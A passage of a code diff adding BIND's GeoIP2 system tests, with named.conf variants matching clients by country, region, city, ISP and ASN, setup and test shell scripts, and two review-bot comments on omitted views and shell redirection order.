+ };
+};
+
+view five {
+ match-clients { geoip db country continent SA; };
+ zone "example" {
+ type primary;
+ file "example5.db";
+ };
+};
+
+view seven {
+ match-clients { geoip db country continent AF; };
+ zone "example" {
+ type primary;
+ file "example7.db";
+ };
+};
+
+view none {
+ match-clients { any; };
+ zone "example" {
+ type primary;
+ file "example.db.in";
+ };
+};
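Review bot: Views `four` and `six` are missing from this config with no comment, which reads like an omission next to the seven-view country configs. Going by the Country test data, the CA address carries continent `NA` (already `view two`) and the DE address carries `EU` (already `view three`), so the gap looks intentional. A line such as `// no view four/six: those clients share a continent with views two and three` ahead of `view five` would record that. named5.conf.in skips `view two` in the same way and would benefit from an equivalent comment.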
diff --git a/bin/tests/system/geoip2/ns2/named5.conf.in b/bin/tests/system/geoip2/ns2/named5.conf.in
new file mode 100644
index 0000000..675dc18
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named5.conf.in
@@ -0,0 +1,92 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view one {
+ match-clients { geoip region CA; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
+
+view three {
+ match-clients { geoip region OK; };
+ zone "example" {
+ type primary;
+ file "example3.db";
+ };
+};
+
+view four {
+ match-clients { geoip region VA; };
+ zone "example" {
+ type primary;
+ file "example4.db";
+ };
+};
+
+view five {
+ match-clients { geoip region GA; };
+ zone "example" {
+ type primary;
+ file "example5.db";
+ };
+};
+
+view six {
+ match-clients { geoip region CO; };
+ zone "example" {
+ type primary;
+ file "example6.db";
+ };
+};
+
+view seven {
+ match-clients { geoip region AK; };
+ zone "example" {
+ type primary;
+ file "example7.db";
+ };
+};
+
+view none {
+ match-clients { any; };
+ zone "example" {
+ type primary;
+ file "example.db.in";
+ };
+};
diff --git a/bin/tests/system/geoip2/ns2/named6.conf.in b/bin/tests/system/geoip2/ns2/named6.conf.in
new file mode 100644
index 0000000..456462f
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named6.conf.in
@@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip city "Redwood City"; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip city "Santa Cruz"; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip city "Oklahoma City"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip city "Ashland"; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip city "Atlanta"; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip city "Morrison"; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip city "Ketchikan"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; 
diff --git a/bin/tests/system/geoip2/ns2/named7.conf.in b/bin/tests/system/geoip2/ns2/named7.conf.in
new file mode 100644
index 0000000..b248e02
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named7.conf.in
@@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip isp "One Systems, Inc."; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip isp "Two Technology Ltd."; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip isp "Three Network Labs"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip isp "Four University"; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip isp "Five Telecom"; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip isp "Six Company"; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip isp "Seven Communications"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; 
diff --git a/bin/tests/system/geoip2/ns2/named8.conf.in b/bin/tests/system/geoip2/ns2/named8.conf.in
new file mode 100644
index 0000000..26660b5
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named8.conf.in
@@ -0,0 +1,100 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view one {
+ match-clients { geoip org "One Systems, Inc."; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
+
+view two {
+ match-clients { geoip org "Two Technology Ltd."; };
+ zone "example" {
+ type primary;
+ file "example2.db";
+ };
+};
+
+view three {
+ match-clients { geoip org "Three Network Labs"; };
+ zone "example" {
+ type primary;
+ file "example3.db";
+ };
+};
+
+view four {
+ match-clients { geoip org "Four University"; };
+ zone "example" {
+ type primary;
+ file "example4.db";
+ };
+};
+
+view five {
+ match-clients { geoip org "Five Telecom"; };
+ zone "example" {
+ type primary;
+ file "example5.db";
+ };
+};
+
+view six {
+ match-clients { geoip org "Six Company"; };
+ zone "example" {
+ type primary;
+ file "example6.db";
+ };
+};
+
+view seven {
+ match-clients { geoip org "Seven Communications"; };
+ zone "example" {
+ type primary;
+ file "example7.db";
+ };
+};
+
+view none {
+ match-clients { any; };
+ zone "example" {
+ type primary;
+ file "example.db.in";
+ };
+};
diff --git a/bin/tests/system/geoip2/ns2/named9.conf.in b/bin/tests/system/geoip2/ns2/named9.conf.in
new file mode 100644
index 0000000..392879b
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named9.conf.in
@@ -0,0 +1,100 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view one {
+ match-clients { geoip asnum "AS100001"; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
+
+view two {
+ match-clients { geoip asnum "AS100002"; };
+ zone "example" {
+ type primary;
+ file "example2.db";
+ };
+};
+
+view three {
+ match-clients { geoip asnum "AS100003"; };
+ zone "example" {
+ type primary;
+ file "example3.db";
+ };
+};
+
+view four {
+ match-clients { geoip asnum "AS100004"; };
+ zone "example" {
+ type primary;
+ file "example4.db";
+ };
+};
+
+view five {
+ match-clients { geoip asnum "AS100005"; };
+ zone "example" {
+ type primary;
+ file "example5.db";
+ };
+};
+
+view six {
+ match-clients { geoip asnum "AS100006"; };
+ zone "example" {
+ type primary;
+ file "example6.db";
+ };
+};
+
+view seven {
+ match-clients { geoip asnum "AS100007"; };
+ zone "example" {
+ type primary;
+ file "example7.db";
+ };
+};
+
+view none {
+ match-clients { any; };
+ zone "example" {
+ type primary;
+ file "example.db.in";
+ };
+};
diff --git a/bin/tests/system/geoip2/prereq.sh b/bin/tests/system/geoip2/prereq.sh
new file mode 100644
index 0000000..8d8528f
--- /dev/null
+++ b/bin/tests/system/geoip2/prereq.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$FEATURETEST --have-geoip2 || {
+ echo_i "This test requires GeoIP support." >&2
+ exit 255
+}
+exit 0
diff --git a/bin/tests/system/geoip2/setup.sh b/bin/tests/system/geoip2/setup.sh
new file mode 100644
index 0000000..22d3c46
--- /dev/null
+++ b/bin/tests/system/geoip2/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns2/named1.conf.in ns2/named.conf
+
+for i in 1 2 3 4 5 6 7 other bogus; do
+ cp ns2/example.db.in ns2/example${i}.db
+ echo "@ IN TXT \"$i\"" >> ns2/example$i.db
+done
diff --git a/bin/tests/system/geoip2/tests.sh b/bin/tests/system/geoip2/tests.sh
new file mode 100644
index 0000000..77b6f93
--- /dev/null
+++ b/bin/tests/system/geoip2/tests.sh
@@ -0,0 +1,489 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +short -p ${PORT} @10.53.0.2" +DIGOPTS6="+tcp +short -p ${PORT} @fd92:7065:b8e:ffff::2 -6" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +for conf in conf/good*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "checking Country database by code using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database by code using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + 
status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 country code test" +fi + +echo_i "reloading server" +copy_setports ns2/named2.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Country database with nested ACLs using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database with nested ACLs using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 country nested ACL test" +fi + +echo_i "reloading server" +copy_setports ns2/named3.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Country database by name using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database by name using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + 
j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 country name test" +fi + +echo_i "reloading server" +copy_setports ns2/named4.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Country database by continent code using IPv4 ($n)" +ret=0 +lret=0 +# deliberately skipping 4 and 6 as they have duplicate continents +for i in 1 2 3 5 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database by continent code using IPv6 ($n)" + ret=0 + lret=0 + # deliberately skipping 4 and 6 as they have duplicate continents + for i in 1 2 3 5 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 continent code test" +fi + +echo_i "reloading server" +copy_setports ns2/named5.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking City database by region code using IPv4 ($n)" +ret=0 +lret=0 +# skipping 2 on purpose here; it has the same region code as 1 +for i in 1 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && 
break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking City database by region code using IPv6 ($n)" + ret=0 + lret=0 +# skipping 2 on purpose here; it has the same region code as 1 + for i in 1 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 region code test" +fi + +n=`expr $n + 1` +echo_i "reloading server" +copy_setports ns2/named6.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking City database by city name using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking City database by city name using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 city test" +fi + +echo_i "reloading server" +copy_setports ns2/named7.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking ISP database using IPv4 ($n)" 
+ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ISP database using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ISP test" +fi + +echo_i "reloading server" +copy_setports ns2/named8.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking ASN database by org name using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ASN database by org name using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ASN test" +fi + +echo_i "reloading server" +copy_setports ns2/named9.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i 
+rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking GeoIP6 ASN database, ASNNNN only, using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ASN database, ASNNNN only, using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ASN test" +fi + +echo_i "reloading server" +copy_setports ns2/named10.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking GeoIP6 ASN database, NNNN only, using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ASN database, NNNN only, using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 
unavailable; skipping IPv6 ASN test" +fi + +echo_i "reloading server" +copy_setports ns2/named11.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Domain database using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Domain database using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 Domain test" +fi + +echo_i "reloading server" +copy_setports ns2/named12.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking geoip blackhole ACL ($n)" +ret=0 +$DIG $DIGOPTS txt example -b 10.53.0.7 > dig.out.ns2.test$n || ret=1 +$RNDCCMD 10.53.0.2 status 2>&1 > rndc.out.ns2.test$n || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/get_algorithms.py b/bin/tests/system/get_algorithms.py new file mode 100755 index 0000000..529487a --- /dev/null +++ b/bin/tests/system/get_algorithms.py 
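Review bot: In the final "geoip blackhole ACL" check, `$RNDCCMD 10.53.0.2 status 2>&1 > rndc.out.ns2.test$n` applies its redirections in the wrong order: stderr is duplicated onto the original stdout before stdout is pointed at the file, so rndc's error text never reaches `rndc.out.ns2.test$n`. If the intent is to keep both streams for post-mortem, write `$RNDCCMD 10.53.0.2 status > rndc.out.ns2.test$n 2>&1 || ret=1`. Separately, every `$CHECKCONF ns2/named.conf | cat_i` before a reload leaves the checker's result unchecked (the pipeline would report `cat_i`'s status anyway), so a rejected config only shows up indirectly as failed lookups after the `sleep 3`. Capturing the status, e.g. `$CHECKCONF ns2/named.conf > checkconf.out.$n 2>&1 || ret=1` followed by `cat_i < checkconf.out.$n`, would make that failure explicit.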
